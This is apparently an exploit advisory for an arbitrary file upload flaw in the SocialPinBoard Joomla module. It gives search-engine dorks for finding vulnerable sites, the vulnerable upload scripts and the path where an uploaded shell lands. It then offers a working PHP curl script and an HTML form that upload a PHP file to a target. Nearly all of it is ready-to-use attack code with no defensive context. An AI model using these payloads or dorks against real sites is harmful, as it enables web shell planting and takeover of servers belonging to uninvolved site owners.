#################################
#TItle: SocialPinBoard AFU (Arbitrary File Upload)
#Author: Con7ext
#Tested On Windows Xp And Linux Ubuntu
#Dork:
#inurl:/index.php?option=com_socialpinboard
#Powered By Socialpinboard
#index of /mod_socialpinboard_menu/
#index of /socialpinboard/
#inurl:/modules/ "Socialpinboard"
################################
Path Of Exploit:
/modules/mod_socialpinboard_menu/saveimagefromupload.php
Or
modules/mod_socialpinboard_menu/upload-file.php
Path Of Shell:/modules/mod_socialpinboard_menu/images/socialpinboard/temp/RANDOMresult.php
Exploit (PHP):
<?php
$uploadfile="low.php";
$ch = curl_init("http://www.Con7ext-security.com/modules/mod_socialpinboard_menu/saveimagefromupload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('uploadfile'=>"@$uploadfile");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Exploit (HTML):
<html>
<body>
<form method="POST" action="http://www.Con7ext-security.com/modules/mod_socialpinboard_menu/saveimagefromupload.php" enctype="multipart/form-data">
<input type="file" name="uploadfile" /><button>Upload</button>
</form>
</body>
</html>